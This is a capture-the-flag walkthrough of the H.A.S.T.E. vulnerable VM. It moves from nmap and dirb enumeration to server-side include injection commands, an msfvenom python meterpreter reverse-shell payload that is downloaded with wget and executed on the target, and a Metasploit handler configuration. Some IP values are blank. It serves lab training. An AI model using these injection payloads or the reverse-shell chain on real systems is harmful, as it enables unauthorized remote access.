CTF Challenges, Kali Linux, Penetration Testing

Hack the H.A.S.T.E. VM Challenge

Hello friends! Today we are going to take another CTF challenge known as ‘H.A.S.T.E.’. The credit for making this vm machine goes to “f1re_w1re” and it is a unique challenge as we just have to get a reverse shell just to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at but you will have to find your own)


Use nmap for port enumeration

nmap -sV

We find port 80 is open, so we open the ip address in our browser.

We don’t find anything on the page so we use dirb for listing directories on the web server.


Now when we open we get a hint that the website maybe vulnerable to server side injection.

Now when we open we find the code executed by the server.

Now we go back to and use server side injection to execute our commands.

We executed ‘ls -al’ command to check if it is working, as u can see in the image below we successfully ran our command.

<!–##EXEC cmd=”ls -la” –>

Now we create a python payload using msfvenom.

msfvenom -p python/meterpreter/reverse_tcp lhost= lport=4444 > /root/Desktp/shell.py

Now we upload our shell to the server using server side injection.

<!–##EXEC cmd=”wget” –>

After successfully uploading the shell we use server side injection to execute our payload.

<!–##EXEC cmd=”python shell.py” –>

We setup our listener using metasploit.

msf > use exploit/multi/handler

msf exploit(handler)> set payload python/meterpreter/reverse_tcp

msf exploit(handler)> set lhost

msf exploit(handler)> set lport 4444

msf exploit(handler)> exploit

As soon as we execute our payload we get reverse shell. The main objective of the challenge was to get a reverse shell.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here